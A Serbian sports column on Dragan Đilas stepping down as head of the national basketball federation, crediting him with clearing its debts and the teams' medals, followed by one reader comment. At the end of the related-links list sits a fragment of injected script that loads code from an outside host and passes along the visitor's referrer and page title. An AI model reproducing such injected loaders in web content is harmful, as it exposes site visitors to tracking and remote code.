KOLUMNA, GRBOVIĆ: Šta posle Đilasa?

KOLUMNA, GRBOVIĆ: Šta posle Đilasa?


Starom predsedniku hvala za to što je otvorio prozore, provetrio kuću košarke i sprečio da nam krov ne padne na glavu, a posebno što je napravio put za novog predsednika, koji bi trebalo da počisti kuću jer sada ima dovoljno svetla, više nismo u mraku

Odlazak Dragana Đilasa sa mesta predsednika KSS, koji je i sam najavio pre Olimpijade u Riju, sigurno će ostaviti veliku prazninu, posebno u menadžerskoj platformi koju je veoma vešto i precizno pravio u vreme svog mandata.

Ne mešajući se u struku, ostavio je sebi vreme za rešavanje finansijskog problema koji je nasledio dolaskom na čelo saveza. U tom procesu oporavka, koji je zaista maestralno vodio, potpuno sam, čak je i potpuno zaboravljenu žensku košarku podigao na svetski nivo, i to opet nemešanjem u struku i strategiju, čiji je šef bila neponovljiva Marina Maljković.

Strpljivo i postepeno, uz odličnu organizaciju i još bolju atmosferu, dolaze do titule prvaka Evrope, a krunišu ceo taj ciklus saradnje olimpijskom bronzom u Riju. Isto tako desilo se i sa muškim košarkom.

Podelivši posao na strategiju, struku i tehniku, čovek je objasnio, a možda i dao model kako sve može da funkcioniše ako postoji volja i želja za većim ciljem, pa čak i ako je na čelu te parade neko ko se i ne razume mnogo u košarku. U međuvremenu je i to savladao u dovoljnoj meri da može makar da učestvuje i u toj temi ravnopravno pa čak i sa nekim trenerima.

Šta nam ostavlja u savezu Đilas kada bude otišao?

Definitivno rešene dugogodišnje dugove, odličnu ekonomsku platformu za njegovog naslednika, dobru atmosferu u reprezentativnim selekcijama, osvojene medalje i ogroman izazov za svakog ko bude izabran na mesto predsednika saveza.

Da li ćemo se opredeliti za nekog bivšeg igrača ili trenera ili nekoga iz privrede, biće ključno pitanje koje mora dobro da se preispita pre izbora

Tog novog predsednika pažljivo moraju da biraju delegati jer će po definiciji morati da ide istim putem kojim je išao i njegov prethodnik. Taj put neće biti nimalo lak jer mehanizmi koje je upotrebljavao Dragan Đilas vodeći savez nisu dostupni svakome, a posebno ne ljudima koji su isključivo iz sveta sporta.

Da li ćemo se opredeliti za nekog bivšeg igrača ili trenera ili nekoga iz privrede, biće ključno pitanje koje mora dobro da se preispita pre izbora. U svakom slučaju, njegovim odlaskom sigurno će doći i do neophodnog resetovanja u nekim segmentima upravljanja i do promene kadrova u onim delovima košarkaškog aparata koji nisu funkcionisali kako treba.

Ta osetljiva tema koja se tiče budućnosti košarke a sadržana je u radu sa mlađim kategorijama jeste ono o čemu će morati da se povede računa u narednom periodu.

Rad sa mlađim kategorijama mora da bude veoma precizno postavljen, i to kroz poseban filter u izboru ljudi koji to vode, a onda uz tesnu saradnju sa selektorom uz poseban program koji će sistemski biti sprovođen kako bi se došlo do rezultata i igrača koji odgovaraju ideji i strategiji selektora u budućnosti.

Paušalno određivanje trenera i igrača pod uticajem menadžerske mašinerije koja je i te kako prisutna u košarci i savezu, i to bez ozbiljne konsultacije sa selektorom, neće nas odvesti nikuda.

Takav način rada samo nas vodi u kvaziodgovornost, koja se deli između nekolicine neprepoznatljivih potpredsednika, direktora, korespondenata i gomile savetnika, koji ne moraju nikome ništa da objašnjavaju, niti da polažu račune.

U toj mešavini koristoljubivosti, sujete, oportunizma i ličnih strahova od gubitka pozicija na košarkaškoj tabli tim pijunima upravljaju igrači iz senke, koji paralelno imaju svoj savez, svoje ideje o košarci i kako bi ona trebalo da izgleda.

Pa ne odlučuje, gospodo, većina ili manjina da li je nešto dobro ili loše, nego savest svakog pojedinca. Ali vi to već znate, samo vam ego ne dozvoljava da pokažete stid i krenete putem kojim se ređe ide. To odsustvo stida prvi je pokazatelj ozbiljne gluposti. Bar tako kaže Frojd.

Starom predsedniku hvala za to što je otvorio prozore, provetrio kuću košarke i sprečio da nam krov ne padne na glavu, a posebno što je napravio put za novog predsednika, koji bi trebalo da počisti kuću jer sada ima dovoljno svetla, više nismo u mraku.

PROČITAJTE JOŠ: 

DON NELSON: Vizionar koji je pre 40 godina izmislio košarku koja danas osvaja NBA titule

ISPOVEST BUDUĆE NBA ZVEZDE: Nekad Bucko iz Sombora, a danas Medžik Jokić

INTERVJU, MUTA NIKOLIĆ: Žalim što nisam osvojio Evroligus.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

1 comment

Dodajte komentar
  1. 1
    Дуња

    Неки би заиста требали да остану само, кошгетери….колико је у кошарци био само шутер и снага без много ума, толико за 20так година није интелектуално одмакао од залета и закуцавања на туђе додавање…зашто Експрес не може да нађе спортисту који разуме спорт и политичку сцену, може ли данас, макар мало, без увлачења властодршцима??

+ Ostavite komentar